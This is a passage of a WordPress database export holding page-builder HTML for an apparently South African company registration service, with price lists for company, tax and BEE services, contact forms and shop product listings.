for=\"et_pb_contact_is_the_more_then_one_shareholder_0_7_0\"><i></i>yes</label>\n							</span><span class=\"et_pb_contact_field_radio\">\n								<input type=\"radio\" id=\"et_pb_contact_is_the_more_then_one_shareholder_0_7_1\" class=\"input\" value=\"no\" name=\"et_pb_contact_is_the_more_then_one_shareholder_0\" data-required_mark=\"required\" data-field_type=\"radio\" data-original_id=\"is_the_more_then_one_shareholder\"  data-id=\"1\">\n								<label for=\"et_pb_contact_is_the_more_then_one_shareholder_0_7_1\"><i></i>no</label>\n							</span></span>\n					</span>\n			</p>\n						<input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_0\">\n						<input type=\"text\" value=\"\" name=\"et_pb_contactform_validate_0\" class=\"et_pb_contactform_validate_field\" />\n						<div class=\"et_contact_bottom_container\">\n							\n			<div class=\"et_pb_contact_right\">\n				<p class=\"clearfix\">\n					<span class=\"et_pb_contact_captcha_question\">6 + 12</span> = <input type=\"text\" size=\"2\" class=\"input et_pb_contact_captcha\" data-first_digit=\"6\" data-second_digit=\"12\" value=\"\" name=\"et_pb_contact_captcha_0\" data-required_mark=\"required\">\n				</p>\n			</div> <!-- .et_pb_contact_right -->\n							<button type=\"submit\" class=\"et_pb_contact_submit et_pb_button\">Submit</button>\n						</div>\n						<input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-0\" name=\"_wpnonce-et-pb-contact-form-submitted-0\" value=\"910e594679\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/?s=contact\" />\n					</form>\n				</div> <!-- .et_pb_contact -->\n			</div> <!-- .et_pb_contact_form_container -->\n			\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section -->\n<span class=\"et_bloom_bottom_trigger\"></span>'),(14946,28554,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_2 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_2\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_2    et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_code et_pb_code_0\">\n				\n				\n				<div class=\"et_pb_code_inner\">\n					[Form id=\"16\"]\n				</div> <!-- .et_pb_code_inner -->\n			</div> <!-- .et_pb_code -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_3 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_3 et_pb_row_fullwidth et_pb_gutters1\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_3    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_0 et_pb_bg_layout_light  et_pb_text_align_left  et_pb_blurb_position_top\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-pb-icon et-waypoint et_pb_animation_top\">&#xe0ef;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\">Company Registration </h4>\n						<div class=\"et_pb_blurb_description\">\n							\n						</div><!-- .et_pb_blurb_description -->\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_0 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Company Registration</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>       <br />\nPrivate Company<br />\nwith 1 Director<br />\n   R 750.00                                         \n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_1 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Private Company – 2 or More Shareholders Directly Involved</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Private Company – 2 or More Shareholders Directly Involved In the Business<br />\nR 1,500.00</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_2 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Personal Liability Company</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>R 2,250.00</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_3 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Private Company With Customised MOI</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>R 4650.00</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_4 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">BEE Affidavit </h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>BEE Affidavit<br />\nR 199.00<br />\n&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_5 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">What I need to know before I start my business in SA </h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>What I need to know before I start my business in SA<br />\nR 199.00<br />\n&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_divider_0 et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_4    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_1 et_pb_bg_layout_light  et_pb_text_align_left  et_pb_blurb_position_top\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-pb-icon et-waypoint et_pb_animation_top\">&#xe0ee;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\">Tax Registration</h4>\n						<div class=\"et_pb_blurb_description\">\n							\n						</div><!-- .et_pb_blurb_description -->\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_6 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Urgent Vat Registration</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p> </p>\n<p>Urgent VAT Registration<br />\nR 5,000.00<br />\n </p>\n<p>&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_7 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Salary Tax Registration (PAYE)</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Salary Tax Registration (PAYE)<br />\nR 1,500.00<br />\n </p>\n<p>&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_8 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Tax Clearance Certificate </h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Tax Clearance Certificate<br />\nR 750.00<br />\n </p>\n<p>&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_9 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Business Income Tax Registration </h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Business Income Tax Registration<br />\nR 450.00<br />\n </p>\n<p>&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_10 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Import &amp; Export Code Registration</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Import and Export Code Registration<br />\nR 2,250.00<br />\n&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_11 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Vat Registration</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>VAT Registration<br />\nR 3,500.00<br />\n&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_divider_1 et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_4 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_4 et_pb_row_fullwidth et_pb_gutters1\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_5    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_blurb et_pb_blurb_2 et_pb_bg_layout_light  et_pb_text_align_left  et_pb_blurb_position_top\">\n				\n				\n				<div class=\"et_pb_blurb_content\">\n					<div class=\"et_pb_main_blurb_image\"><span class=\"et_pb_image_wrap\"><span class=\"et-pb-icon et-waypoint et_pb_animation_top\">&#xe038;</span></span></div>\n					<div class=\"et_pb_blurb_container\">\n						<h4 class=\"et_pb_module_header\">Maintaining Your Company </h4>\n						<div class=\"et_pb_blurb_description\">\n							\n						</div><!-- .et_pb_blurb_description -->\n					</div>\n				</div> <!-- .et_pb_blurb_content -->\n			</div> <!-- .et_pb_blurb --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_12 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Annual Returns</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Annual Returns<br />\nR 450.00<br />\n&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_13 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Change In Director/s</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Change In Director/s<br />\nR 450.00<br />\n&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_14 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Change in CC Member/s</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Change in CC Member/s<br />\nR 450.00<br />\n&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_15 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Change in CC Address</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Change in CC Address<br />\nR 450.00<br />\n&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_toggle et_pb_toggle_16 et_pb_toggle_item  et_pb_toggle_close\">\n				\n				\n				<h5 class=\"et_pb_toggle_title\">Company and Close Corporations Restorations</h5>\n				<div class=\"et_pb_toggle_content clearfix\">\n					<p>Company and Close Corporations Restorations<br />\nR 3,500.00<br />\n&nbsp;</p>\n				</div> <!-- .et_pb_toggle_content -->\n			</div> <!-- .et_pb_toggle --><div class=\"et_pb_module et_pb_divider_2 et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_6    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_divider_3 et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			<div id=\"et_pb_contact_form_0\" class=\"et_pb_module et_pb_contact_form_1 et_pb_contact_form_container clearfix\" data-form_unique_num=\"1\">\n				\n				\n				<h1 class=\"et_pb_contact_main_title\">Did Not Find What You Are Looking For?? </h1>\n				<div class=\"et-pb-contact-message\"></div>\n				\n				<div class=\"et_pb_contact\">\n					<form class=\"et_pb_contact_form clearfix\" method=\"post\" action=\"https://companyregistration.online/category/\">\n						 <p class=\"et_pb_contact_field et_pb_contact_field_8 et_pb_contact_field_half\" data-id=\"name\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_name_1\" class=\"et_pb_contact_form_label\">Name</label>\n				<input type=\"text\" id=\"et_pb_contact_name_1\" class=\"input\" value=\"\" name=\"et_pb_contact_name_1\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"name\" placeholder=\"Name\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_9 et_pb_contact_field_half et_pb_contact_field_last\" data-id=\"email\" data-type=\"email\">\n				\n				\n				<label for=\"et_pb_contact_email_1\" class=\"et_pb_contact_form_label\">Email Address</label>\n				<input type=\"text\" id=\"et_pb_contact_email_1\" class=\"input\" value=\"\" name=\"et_pb_contact_email_1\" data-required_mark=\"required\" data-field_type=\"email\" data-original_id=\"email\" placeholder=\"Email Address\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_10 et_pb_contact_field_last\" data-id=\"message\" data-type=\"text\">\n				\n				\n				<label for=\"et_pb_contact_message_1\" class=\"et_pb_contact_form_label\">Message</label>\n				<textarea name=\"et_pb_contact_message_1\" id=\"et_pb_contact_message_1\" class=\"et_pb_contact_message input\" data-required_mark=\"required\" data-field_type=\"text\" data-original_id=\"message\" placeholder=\"Message\"></textarea>\n			</p> \n						<input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_1\">\n						<input type=\"text\" value=\"\" name=\"et_pb_contactform_validate_1\" class=\"et_pb_contactform_validate_field\" />\n						<div class=\"et_contact_bottom_container\">\n							\n			<div class=\"et_pb_contact_right\">\n				<p class=\"clearfix\">\n					<span class=\"et_pb_contact_captcha_question\">3 + 3</span> = <input type=\"text\" size=\"2\" class=\"input et_pb_contact_captcha\" data-first_digit=\"3\" data-second_digit=\"3\" value=\"\" name=\"et_pb_contact_captcha_1\" data-required_mark=\"required\">\n				</p>\n			</div> <!-- .et_pb_contact_right -->\n							<button type=\"submit\" class=\"et_pb_contact_submit et_pb_button\">Send Inquiry</button>\n						</div>\n						<input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-1\" name=\"_wpnonce-et-pb-contact-form-submitted-1\" value=\"910e594679\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/?s=contact\" />\n					</form>\n				</div> <!-- .et_pb_contact -->\n			</div> <!-- .et_pb_contact_form_container -->\n			<div class=\"et_pb_module et_pb_divider_4 et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_5 et_section_regular\">\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_5\">\n				<div class=\"et_pb_column et_pb_column_1_2 et_pb_column_7    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_shop et_pb_shop_0 \">\n				\n				\n				<div class=\"woocommerce columns-3 \"><ul class=\"products columns-3\">\n<li class=\"product type-product post-28 status-publish first instock product_cat-company-registration product_tag-company-registration product_tag-new-company product_tag-private-company has-post-thumbnail featured virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-400x400.jpg\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-400x400.jpg 400w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-510x510.jpg 510w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-100x100.jpg 100w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-150x150.jpg 150w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-300x300.jpg 300w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-200x200.jpg 200w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover-450x450.jpg 450w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-cover.jpg 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Private Company &#8211; Owner Managed</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;750.00</span></span>\n</a></li>\n<li class=\"product type-product post-59 status-publish instock product_cat-company-registration product_tag-common product_tag-medium-business product_tag-new-registration product_tag-private-company has-post-thumbnail featured virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-full/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Company registration full\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-full-cover.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Private Company &#8211;  Multiple Shareholders</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;1,500.00</span></span>\n</a></li>\n<li class=\"product type-product post-64 status-publish last instock product_cat-company-registration product_tag-accountant product_tag-doctor product_tag-lawyer product_tag-personal-liability product_tag-professional has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Personal Liability Company\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Personal-Liability-Company.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Personal Liability Company</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;2,250.00</span></span>\n</a></li>\n<li class=\"product type-product post-62 status-publish first instock product_cat-company-registration product_tag-change-rights product_tag-customised-moi product_tag-private-company has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Private Company registration customised MOI\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Private-Company-registration-customised-MOI.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Private Company customised MOI &#8211; with executive and non-executive directors</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;4,650.00</span></span>\n</a></li>\n</ul>\n</div>\n			</div>\n			</div> <!-- .et_pb_column --><div class=\"et_pb_column et_pb_column_1_2 et_pb_column_8    et_pb_css_mix_blend_mode_passthrough\">\n				\n				\n				<div class=\"et_pb_module et_pb_shop et_pb_shop_1 \">\n				\n				\n				<div class=\"woocommerce columns-3 \"><ul class=\"products columns-3\">\n<li class=\"product type-product post-29681 status-publish first instock product_cat-3rd-party-software product_tag-accounting product_tag-cloud product_tag-zoho has-post-thumbnail shipping-taxable purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/3rd-party-software/zoho-books-cloud-accounting-monthly/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2019/06/zoho-monthly-2-1-400x400.gif\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"\" srcset=\"https://companyregistration.online/wp-content/uploads/2019/06/zoho-monthly-2-1-400x400.gif 400w, https://companyregistration.online/wp-content/uploads/2019/06/zoho-monthly-2-1-150x150.gif 150w, https://companyregistration.online/wp-content/uploads/2019/06/zoho-monthly-2-1-100x100.gif 100w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Zoho Books Cloud Accounting Monthly</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;135.00</span></span>\n</a></li>\n<li class=\"product type-product post-74 status-publish instock product_cat-tax-registration product_tag-income-tax product_tag-income-tax-number product_tag-tax-number has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/tax-registration/income-tax-registration/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Income tax registration\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/Income-tax-registration-1.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">Business Income Tax Registration</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;150.00</span></span>\n</a></li>\n<li class=\"product type-product post-79 status-publish last instock product_cat-bee-requirements product_tag-affidavit product_tag-bee product_tag-eme product_tag-enterprise product_tag-exempted product_tag-micro has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/bee-requirements/bee-affidavit/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-400x400.png\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"BEE Affidavit\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-400x400.png 400w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-510x510.png 510w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-100x100.png 100w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-150x150.png 150w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-300x300.png 300w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-200x200.png 200w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final-450x450.png 450w, https://companyregistration.online/wp-content/uploads/2016/03/BEE-Affidavit-cover-Final.png 600w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">BEE Affidavit</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;199.00</span></span>\n</a></li>\n<li class=\"product type-product post-80 status-publish first instock product_cat-business-tools product_tag-acts product_tag-coida product_tag-compensation product_tag-deadlines product_tag-free product_tag-help product_tag-legislation product_tag-my-business product_tag-report product_tag-tax product_tag-taxes product_tag-wca product_tag-what product_tag-workmens has-post-thumbnail downloadable virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/business-tools/what-i-need-to-know-before-i-start-my-business/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" src=\"https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1-400x400.jpg\" class=\"attachment-woocommerce_thumbnail size-woocommerce_thumbnail\" alt=\"Ebook\" srcset=\"https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1-400x400.jpg 400w, https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1-100x100.jpg 100w, https://companyregistration.online/wp-content/uploads/2016/07/Free-Report-cover-1-150x150.jpg 150w\" sizes=\"(max-width: 400px) 100vw, 400px\" /><span class=\"et_overlay\"></span></span><h2 class=\"woocommerce-loop-product__title\">What I need to know before I start my business in SA</h2>\n	<span class=\"price\"><span class=\"woocommerce-Price-amount amount\"><span class=\"woocommerce-Price-currencySymbol\">&#82;</span>&nbsp;199.00</span></span>\n</a></li>\n<li class=\"product type-product post-65 status-publish instock product_cat-maintaning-our-company product_tag-appoint product_tag-change product_tag-director product_tag-remove has-post-thumbnail virtual sold-individually purchasable product-type-simple\">\n	<a href=\"https://companyregistration.online/shop/maintaning-our-company/change-in-directors/\" class=\"woocommerce-LoopProduct-link woocommerce-loop-product__link\"><span class=\"et_shop_image\"><img width=\"400\" height=\"400\" 